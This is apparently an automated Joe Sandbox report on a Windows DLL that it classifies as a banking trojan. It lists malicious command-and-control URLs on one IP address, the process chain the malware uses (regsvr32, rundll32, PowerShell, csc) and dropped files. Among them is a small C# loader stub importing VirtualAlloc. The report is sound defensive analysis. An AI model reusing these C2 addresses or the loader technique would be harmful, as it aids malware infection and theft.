http://194.76.226.200/drew/qj8KFpDyUAB/xQ_2FW_2FRVQUR/xo7UR19sTv1fTteFGwviu/H1QAugjBS9BAganl/OqUmHFdTh92Mttp/bKzDAO3E0N_2BxZ1ow/sTpBKLA2p/6BUrMhtfsbHTEuRLWcq7/jTbARM2BAFwOLbLtYBa/i_2BLCetjq8jqUWnEo5XCb/sLP1ktID7e6VC/G3BV6Vkb/N29_2BJlXZ2HReVfDXYWlEP/mt9DueL_2F/NgPtBNn5wZiJtUInd/fWiE7TY0/hCY.jlk | 0% | Avira URL Cloud | safe
http://194.76.226.200/drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQ | 0% | Avira URL Cloud | safe
http://194.76.226.200/drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQPJwabF/oYnH6redQswcAwtL/rDlMsMT_2FoiQ_2/BdNrJdcFdtJq9vsrPj/Pi_2B3_2B/dnsHU70OV9c4KUJyE_2F/0ip_2FIZ7Wqza0Ho2lN/KYodlnq6PG5KK9SBFWXHj5/viPS4jjPVWzpA/_2B2JOAM/KOBPUpSnsG9auoSxo_2BhjX/PvM1mRJl_2/FaBIYOp1w1wVY3Kqd/ZfinCIlH/i.jlk | 0% | Avira URL Cloud | safe
http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe
http://194.76.226.200/drew/F2DN_2FU1e/fQ5u04QtqSS_2Fpez/wjKfLKebrhaF/MMToBjmjMxS/2NhI76XoCH_2F5/14TeSntbngCZZYLUNIrhm/x6MB8tXx2hU99kkL/VY0QQM3MDv5NCL1/6ydwr5AoPHPZyujorj/zsR7mWAsu/Dgwxr2J_2Bt6yrRwZsuj/G0YF7iDIM95RsJq2szP/8WMC9D3LjonMIPvdKF1kRz/NQS_2FA_2BozQ/hVadPzcD/tG9pjaS8y_2BWqM0wQM2d5M/W.jlk | 0% | Avira URL Cloud | safe
http://194.76.226.200/drew/SzHdMdWvg/8JrkfhvX1ImoPdiWmQP6/QNbELOUZkV6PJ_2F_2B/T_2FBOZzzLom_2BccXK2f_/2B4napL_2F34z/ZunofQOB/e8FUQk93KOWF2nr5L7lasmZ/NJz0CTr65M/vqC70qv5uFkSE3WWV/uzLbKezipUQb/EiDVCVAB9rI/YTJRJOijIzHReN/lOWZ3chpUTxk47un6IsE8/fGRw3zIlPFEXwpmw/KXHYTQF2fkI3XOU/3s8f8mWLipjSZC2MeH/eanpmASqD48wQWqOn/qyD.jlk | 0% | Avira URL Cloud | safe
http://194.76.226.200/drew/HzhM5fP5x43l7rSkYr8Y/jYk_2FxetzKCt9WlQ60/DHr3pyDc_2BukVZ7K3nBXi/MEA2Xn3fXlFfO/GgBWR09O/Z1DKEGLlegReZBua8Nnmy16/fhqdF_2Beg/hrDVYSGiYpSkF5kA7/KsGOnRLVKqBx/xsw07jdGhl6/opBuLWprNFNT7s/OVJpMrjpCjISLpLDnGaGt/ixsS7exYYQrwdM8F/_2FgW9_2FjtCahO/8Yp45dJrj8Sd2mVa6W/QapGna.jlk | 0% | Avira URL Cloud | safe
http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe
http://194.76.226.200/drew/2f3T6_2Fldpw_2BA6Engti/ap9anBYrptHHy/xCGyvO5i/wYPccsVOVAKMkuNvsUxMYE4/RkZB4YqLqe/XacN1M_2FaB24Ib2R/hVRxOozHufuZ/c6WQY_2FOGu/wQlIyAdYSezuQl/ojNT2IxdKraylKm035Q_2/FdvJBuYlSvhCsegR/oboSzu_2BtJ_2BW/XMLPOefEKMYQuO_2B_/2FNWtFwdl/dQERZJKq6wr_2FxRn8R5/MLhj_2Fz9ge97_2BBFz/rUr1Agrx59/b.jlk | 0% | Avira URL Cloud | safe
http://194.76.226.200/drew/q2MoEGVRNe15Nk60/LDrmU6_2F0GkU3d/_2F0Knrw_2BLeOfpGj/fbCS28O8a/HzEmaSZQ4r2 | 0% | Avira URL Cloud | safe
http://194.76.226.200/BFA | 0% | Avira URL Cloud | safe
http://194.76.226.200/drew/S0hO4k1kNWmaIbAIKk6J/C6ltlnn67F9zU4319Wq/SHohWMCDfW7oiPhqwsiIKI/bmU8FVW7o | 0% | Avira URL Cloud | safe
http://194.76.226.200/mA | 0% | Avira URL Cloud | safe
http://194.76.226.200/M | 0% | Avira URL Cloud | safe
http://194.76.226.200/drew/m0QZKcj4ankL3W/8FVzGu6iQpcBkrTN5v3eZ/A6WzaqZBs9gogbdq/m8YEYG_2B_2FLSM/NM7 | 0% | Avira URL Cloud | safe
            No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://194.76.226.200/drew/S0hO4k1kNWmaIbAIKk6J/C6ltlnn67F9zU4319Wq/SHohWMCDfW7oiPhqwsiIKI/bmU8FVW7oRmBm/mR3BXgY_/2FBwUjw6HBJfko8dOlgJjVp/0AJ_2FHS_2/F6As3DqY8qnvNETrK/YeXgHXybA3MO/9wS_2FpxfKh/va60IJVV7f3myC/lkXy0Vd4C9gsuVelNEUUO/TZ36G6O4b_2Br5X5/Ty9Sl6i_2F9Ot_2/Fw5KU6KNbXI13KA_2B/fSlw9uxRZ/1GDQy2uvqr3Bg6MoNgQy/Xe_2F1.jlk | true | Avira URL Cloud: safe | unknown
http://194.76.226.200/drew/m0QZKcj4ankL3W/8FVzGu6iQpcBkrTN5v3eZ/A6WzaqZBs9gogbdq/m8YEYG_2B_2FLSM/NM7eY2w3b1aL2aX8An/zJ6Vy7aKV/77q51XwDss_2Bne92xk6/rrRqhSV7rhVbP2hjU6R/_2B0H8cg3MM0IyieU8GPC9/gTwDi0Qx4J0HW/gyC_2FqL/iUkABk5euk2dlDO3ecBxilL/xQJUPbO4iF/9AhmuI174lSXWne_2/Fo5eEhaaDB/xKb9szQ5MHJ/1.jlk | true | Avira URL Cloud: safe | unknown
http://194.76.226.200/drew/q2MoEGVRNe15Nk60/LDrmU6_2F0GkU3d/_2F0Knrw_2BLeOfpGj/fbCS28O8a/HzEmaSZQ4r2vrrl3ds_2/FJYs8ohc9ZfX55MptAq/LUXti_2BtVHZBpG5bp31OD/nUDVndp9HwGDI/fdApFg3Y/hh5zxa6uVZWdnbZZ4Zw497E/am4BWYNw05/CiWFAq8EmF0WMEY2m/vQZOFYV25Mfi/UplJo0Tr14k/U65NpQlAx9OU47/ZEIy4h_2BMYYm16tA/UAd.jlk | true | Avira URL Cloud: safe | unknown
http://194.76.226.200/drew/qj8KFpDyUAB/xQ_2FW_2FRVQUR/xo7UR19sTv1fTteFGwviu/H1QAugjBS9BAganl/OqUmHFdTh92Mttp/bKzDAO3E0N_2BxZ1ow/sTpBKLA2p/6BUrMhtfsbHTEuRLWcq7/jTbARM2BAFwOLbLtYBa/i_2BLCetjq8jqUWnEo5XCb/sLP1ktID7e6VC/G3BV6Vkb/N29_2BJlXZ2HReVfDXYWlEP/mt9DueL_2F/NgPtBNn5wZiJtUInd/fWiE7TY0/hCY.jlk | true | Avira URL Cloud: safe | unknown
http://194.76.226.200/drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQPJwabF/oYnH6redQswcAwtL/rDlMsMT_2FoiQ_2/BdNrJdcFdtJq9vsrPj/Pi_2B3_2B/dnsHU70OV9c4KUJyE_2F/0ip_2FIZ7Wqza0Ho2lN/KYodlnq6PG5KK9SBFWXHj5/viPS4jjPVWzpA/_2B2JOAM/KOBPUpSnsG9auoSxo_2BhjX/PvM1mRJl_2/FaBIYOp1w1wVY3Kqd/ZfinCIlH/i.jlk | true | Avira URL Cloud: safe | unknown
http://194.76.226.200/drew/F2DN_2FU1e/fQ5u04QtqSS_2Fpez/wjKfLKebrhaF/MMToBjmjMxS/2NhI76XoCH_2F5/14TeSntbngCZZYLUNIrhm/x6MB8tXx2hU99kkL/VY0QQM3MDv5NCL1/6ydwr5AoPHPZyujorj/zsR7mWAsu/Dgwxr2J_2Bt6yrRwZsuj/G0YF7iDIM95RsJq2szP/8WMC9D3LjonMIPvdKF1kRz/NQS_2FA_2BozQ/hVadPzcD/tG9pjaS8y_2BWqM0wQM2d5M/W.jlk | true | Avira URL Cloud: safe | unknown
http://194.76.226.200/drew/SzHdMdWvg/8JrkfhvX1ImoPdiWmQP6/QNbELOUZkV6PJ_2F_2B/T_2FBOZzzLom_2BccXK2f_/2B4napL_2F34z/ZunofQOB/e8FUQk93KOWF2nr5L7lasmZ/NJz0CTr65M/vqC70qv5uFkSE3WWV/uzLbKezipUQb/EiDVCVAB9rI/YTJRJOijIzHReN/lOWZ3chpUTxk47un6IsE8/fGRw3zIlPFEXwpmw/KXHYTQF2fkI3XOU/3s8f8mWLipjSZC2MeH/eanpmASqD48wQWqOn/qyD.jlk | true | Avira URL Cloud: safe | unknown
http://194.76.226.200/drew/HzhM5fP5x43l7rSkYr8Y/jYk_2FxetzKCt9WlQ60/DHr3pyDc_2BukVZ7K3nBXi/MEA2Xn3fXlFfO/GgBWR09O/Z1DKEGLlegReZBua8Nnmy16/fhqdF_2Beg/hrDVYSGiYpSkF5kA7/KsGOnRLVKqBx/xsw07jdGhl6/opBuLWprNFNT7s/OVJpMrjpCjISLpLDnGaGt/ixsS7exYYQrwdM8F/_2FgW9_2FjtCahO/8Yp45dJrj8Sd2mVa6W/QapGna.jlk | true | Avira URL Cloud: safe | unknown
http://194.76.226.200/drew/2f3T6_2Fldpw_2BA6Engti/ap9anBYrptHHy/xCGyvO5i/wYPccsVOVAKMkuNvsUxMYE4/RkZB4YqLqe/XacN1M_2FaB24Ib2R/hVRxOozHufuZ/c6WQY_2FOGu/wQlIyAdYSezuQl/ojNT2IxdKraylKm035Q_2/FdvJBuYlSvhCsegR/oboSzu_2BtJ_2BW/XMLPOefEKMYQuO_2B_/2FNWtFwdl/dQERZJKq6wr_2FxRn8R5/MLhj_2Fz9ge97_2BBFz/rUr1Agrx59/b.jlk | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://curlmyip.net | loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://194.76.226.200/ | rundll32.exe, 00000005.00000003.370229041.0000000003374000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.358439185.0000000003374000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.359952251.0000000003374000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ipinfo.io/ip | loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://constitution.org/usdeclar.txt | loaddll32.exe, 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://194.76.226.200/drew/qj8KFpDyUAB/xQ_2FW_2FRVQUR/xo7UR19sTv1fTteFGwviu/H1QAugjBS9BAganl/OqUmHFd | regsvr32.exe, 00000003.00000003.369970075.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.499946286.000000000337C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.455323184.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.369984660.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.377995492.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.370876797.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.370736474.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.517881425.000000000337D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.499574749.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.509029101.0000000003392000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.518096997.0000000003392000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://curlmyip.netJv1GYc8A8hCBIeVDfile://c: | loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://194.76.226.200/drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQ | regsvr32.exe, 00000003.00000003.499946286.000000000337C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.370876797.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.517659342.0000000003366000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.509976865.0000000003365000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.517881425.000000000337D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.500987131.0000000003362000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://constitution.org/usdeclar.txtC: | loaddll32.exe, 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://https://file://USER.ID%lu.exe/upd | loaddll32.exe, 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://194.76.226.200/drew/q2MoEGVRNe15Nk60/LDrmU6_2F0GkU3d/_2F0Knrw_2BLeOfpGj/fbCS28O8a/HzEmaSZQ4r2 | rundll32.exe, 00000004.00000003.498230498.000000000334F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.501303183.000000000334F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.370021803.000000000334C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.492598274.000000000334C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://194.76.226.200/BFA | rundll32.exe, 00000005.00000003.358439185.0000000003374000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://194.76.226.200/drew/S0hO4k1kNWmaIbAIKk6J/C6ltlnn67F9zU4319Wq/SHohWMCDfW7oiPhqwsiIKI/bmU8FVW7o | rundll32.exe, 00000005.00000002.498298788.0000000003380000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://194.76.226.200/mA | regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://194.76.226.200/M | regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://194.76.226.200/drew/m0QZKcj4ankL3W/8FVzGu6iQpcBkrTN5v3eZ/A6WzaqZBs9gogbdq/m8YEYG_2B_2FLSM/NM7 | rundll32.exe, 00000005.00000003.358348203.0000000003380000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
194.76.226.200 | unknown | Germany | 39378 | SERVINGADE | true

IP
192.168.2.1
              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:560270
              Start date:26.01.2022
              Start time:10:26:42
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 18m 54s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:61f113091fd0c.dll
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes:51
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.bank.troj.evad.winDLL@76/57@0/2
              EGA Information:
              • Successful, ratio: 50%
              HDC Information:
              • Successful, ratio: 20.5% (good quality ratio 19.6%)
              • Quality average: 79.9%
              • Quality standard deviation: 28.3%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 215
              • Number of non-executed functions: 302
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .dll
              • Override analysis time to 240s for rundll32
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 13.107.42.16
              • Excluded domains from analysis (whitelisted): config.edge.skype.com.trafficmanager.net, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, arc.msn.com, config.edge.skype.com
• Execution Graph export aborted for target mshta.exe, PID 1956 because there are no executed functions
• Execution Graph export aborted for target mshta.exe, PID 5280 because there are no executed functions
• Execution Graph export aborted for target mshta.exe, PID 6092 because there are no executed functions
• Execution Graph export aborted for target mshta.exe, PID 7156 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
              • Report creation exceeded maximum time and may have missing behavior and disassembly information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • VT rate limit hit for: 61f113091fd0c.dll
Time | Type | Description
10:27:46 | API Interceptor | 10x Sleep call for process: rundll32.exe modified
10:27:47 | API Interceptor | 5x Sleep call for process: regsvr32.exe modified
10:27:47 | API Interceptor | 6x Sleep call for process: loaddll32.exe modified
10:28:27 | API Interceptor | 150x Sleep call for process: powershell.exe modified
              No context
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):11606
              Entropy (8bit):4.883977562702998
              Encrypted:false
              SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
              MD5:1F1446CE05A385817C3EF20CBD8B6E6A
              SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
              SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
              SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
              Malicious:false
              Reputation:unknown
              Preview:PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text
              Category:dropped
              Size (bytes):408
              Entropy (8bit):5.01293234302818
              Encrypted:false
              SSDEEP:6:V/DsYLDS81zuJAsNiWVMRSRa+eNMjSSRrjEzxevVSRNveKP8nQe3CGy:V/DTLDfuH0Wl9eg5r4NevU1eKPJeyGy
              MD5:35EAB9A45B1CC09A0099A179AD3DCFE5
              SHA1:42939AC7047BC372300FDD21624100E5C9F83B7F
              SHA-256:EEEECB79A83F234A098D4E685F9649E562EE2C5180DA03CE782DF3F95D7EB5A7
              SHA-512:03DB096CD43E298A526507BE3252F718516E26ECB50400D052B9C26E76EB89F950770696F2034FD9031E3421EE5F7E225D985BFD92CC51338EC19854C85017C1
              Malicious:false
              Reputation:unknown
              Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class sbjqhhwtq. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint cfuaonbeh,uint oaxrtopxx);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr ckpaa,uint gmprdfblmj,uint nuadeidgng,uint pxgmfdeh);.. }..}.
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
              Category:dropped
              Size (bytes):351
              Entropy (8bit):5.255934415649345
              Encrypted:false
              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fNCzxs7+AEszIWXp+N23fNH:p37Lvkmb6KH0WZE8x
              MD5:7EE5D883B6955CCFAE7CAD3FE22CB99B
              SHA1:67C0F50C1230CFC726F1CEA4B70A4834B0B4FCE1
              SHA-256:F52B96F19A2EA70864B64E8E0A2DDD5D8F9136E3764FA942235E70E721878AD4
              SHA-512:5DD034E4A1B0AEB04A674425076D05D489518A4EEE06CA7E81CEC4C1D9DB140744EF0E49974B6E80113A60BB0200387FDCE39EB406799413F59428012AB6D25E
              Malicious:false
              Reputation:unknown
              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0hsihch1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0hsihch1.0.cs"
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):3584
              Entropy (8bit):2.622757174603961
              Encrypted:false
              SSDEEP:48:6LXE7S5FwYXok+2W8JsgWZX1ulxqa3mRq:p7S5ek4pe2K
              MD5:16C2ADA8A386BC091BA2102AA2EAAA8A
              SHA1:CCED25C37AD736241E59EE63B4AD83CEFA795E69
              SHA-256:C2BFD0A629378ED8B80CFFE1EA3CD691F2A15C3FFE3D9495604AC732DCB94BF3
              SHA-512:00848E983DC3B5C5FA11F7D403C2E4F9ADE4C2DBB4DF70D7693E855C62A60D5576932ABCB70A258502B0E3B6B552B9EE9B6350432EF1EB67E7E25F231D474F79
              Malicious:false
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................5.................(.......................!.............. <............ N............ V.....P ......c.........i.....s.....}.....................c. ...c...!.c.%...c.......*.....3.;.....<.......N.......V...........
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
              Category:modified
              Size (bytes):848
              Entropy (8bit):5.321063231466278
              Encrypted:false
              SSDEEP:12:xKIR37Lvkmb6KH0WZE8UKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KHVE8UKaM5DqBVKVrdFAMBJTH
              MD5:307A9BF290A954A780806D0654D542DB
              SHA1:5AFBAC2DAEF8EDD20D557E79BB490DC10026604C
              SHA-256:5ABE22E6476D658788B11406CF28AAF1AE8C35A61504694A202B6D836A535EB4
              SHA-512:84C6CDB87D8955A36765134E3A0B5A21F927C5A46112BBD0628E7D356DA253EF71F41A75BB3528B9C8A99782F0BEF48AD8522DC58279EF0DFD34C245EFA7D147
              Malicious:false
              Reputation:unknown
              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0hsihch1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0hsihch1.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:MSVC .res
              Category:dropped
              Size (bytes):652
              Entropy (8bit):3.1116314649348857
              Encrypted:false
              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry16ak7YnqqOLPN5Dlq5J:+RI+ycuZhNv6akSOLPNnqX
              MD5:4D219614CBA84381F96B83F1027944AC
              SHA1:B1555827904FF1867D12D78853FE3860A13732FE
              SHA-256:A5A109C402C8B0CE26398AD22860F9386E31DAB339D6C44ECD466D5484928202
              SHA-512:E830AE63BF41467AFC236F7C1A5951A668122CF0AE8F8E6361F2B1F64BBD432ED238319844EA3E76CC4D87D92522CCF647A77208ED451ACE468EF2A9F4ED4BBC
              Malicious:false
              Reputation:unknown
              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.q.v.o.g.m.w.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.q.v.o.g.m.w.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:MSVC .res
              Category:dropped
              Size (bytes):652
              Entropy (8bit):3.1130536385099568
              Encrypted:false
              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryxGak7YnqqaXPN5Dlq5J:+RI+ycuZhNaakSCPNnqX
              MD5:CB71703D29E5D95F33A5CE8E646DAC20
              SHA1:8F2293399F6CF908E6E651F1ADD9BAC2F861BBB6
              SHA-256:4DA97D39F383049194CB544D7720D0742787A66533287D22F8BD837560F06776
              SHA-512:0A29A43362DB781B176263085CBDF98AACCF5E49EAE9F602908AAFE3202E560D5B250E2BE45E9ADE6DAC84A5875A066AC689FCCBA89CEC32619FE8197AEEE910
              Malicious:false
